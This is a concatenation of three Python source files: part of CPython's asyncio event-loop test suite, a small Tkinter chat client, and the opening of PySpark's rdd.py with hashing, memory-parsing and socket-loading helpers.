self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
        _, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
def test_get_event_loop_new_process(self):
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.unpatch_get_running_loop()
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
        h = loop.call_at(loop.time(), noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
        # Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_code or gi_code attributes
        # (such as ones compiled with Cython).
class Coro:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
coro = Coro()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro = Coro()
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'Coro()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_recv_into, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
def test_get_event_loop_returns_running_loop(self):
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise NotImplementedError
loop = None
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
self.assertIs(asyncio._get_running_loop(), None)
if __name__ == '__main__':
unittest.main()
|
client.pyw
|
"""
这里是客户端文件,负责创建聊天室窗口
"""
from threading import Thread
from address import *
from plugins.lib.root import *
s.connect((host, port))  # Connect to the server
root.title("SimpleChat")  # Window title
message_frame.grid(row=0, column=0, padx=3, pady=6)  # Message area: row 0, column 0
text_frame.grid(row=1, column=0, padx=3, pady=6)  # Input area: row 1, column 0
sent_frame.grid(row=2, column=0)  # Send button: row 2, column 0
config.grid(row=0, column=1)  # Admin button: row 0, column 1
message_frame.grid_propagate(0)  # Keep the message area at a fixed size
text_frame.grid_propagate(0)  # Keep the input area at a fixed size
sent_frame.grid_propagate(0)  # Keep the send button at a fixed size
config.grid_propagate(0)  # Keep the admin button at a fixed size
text_message.grid()  # Put the message widget into its container
text_text.grid()  # Put the input widget into its container
button_sent.grid()  # Put the send button into its container
config.grid()  # Put the admin button into its container
receive_thread = Thread(target=get_msg)  # Create the receiver thread
receive_thread.start()  # Start the thread
root.mainloop()  # Start the Tk main loop
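# Editorial sketch (not part of the original file): the socket `s`, the Tk
# widgets and the `get_msg` callback used above come from the star imports and
# are not visible here. The commented snippet below is a minimal, self-contained
# guess at that receive loop; every name in it (host, port, text_message,
# get_msg) is assumed for illustration and follows the same thread-plus-Tk
# pattern used by this file.
#
#     import socket
#     import tkinter as tk
#     from threading import Thread
#
#     host, port = "127.0.0.1", 9999        # hypothetical server address
#     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     s.connect((host, port))
#
#     root = tk.Tk()
#     text_message = tk.Text(root)          # message display area
#     text_message.grid()
#
#     def get_msg():
#         # Receive server messages and append them to the display.
#         while True:
#             data = s.recv(1024)
#             if not data:
#                 break
#             text_message.insert(tk.END, data.decode("utf-8") + "\n")
#
#     Thread(target=get_msg, daemon=True).start()
#     root.mainloop()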
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
    This function returns a consistent hash code for builtin types, especially
    for None and for tuples containing None.
    The algorithm is similar to the one used by CPython 2.7.
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return h
return hash(x)
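# Editorial note: CPython reserves a hash value of -1 as an internal error
# marker, which is why the tuple branch above maps -1 to -2, following the
# same convention as CPython's own tuple hashing.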
class BoundedFloat(float):
"""
    A float value produced by an approximate job, carrying a confidence level
    together with low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1] not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
    """
    Connect to the local JVM-side socket server on the given port and yield
    the items it streams back, deserialized with the given serializer.
    """
sock = socket.socket()
sock.settimeout(3)
try:
sock.connect(("localhost", port))
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
def ignore_unicode_prefix(f):
"""
    Ignore the 'u' prefix of strings in doctests, so that they work
    in both Python 2 and 3.
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
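# Editorial sketch (not part of the upstream module): a Partitioner routes a
# key to a partition index via partitionFunc(key) % numPartitions. Assuming
# PYTHONHASHSEED is set (as portable_hash above requires on Python 3.3+):
#
#     p = Partitioner(4, portable_hash)
#     p("spark")                # an index in range(4)
#     p("spark") == p("spark")  # True: the same key always lands in the same partition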
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
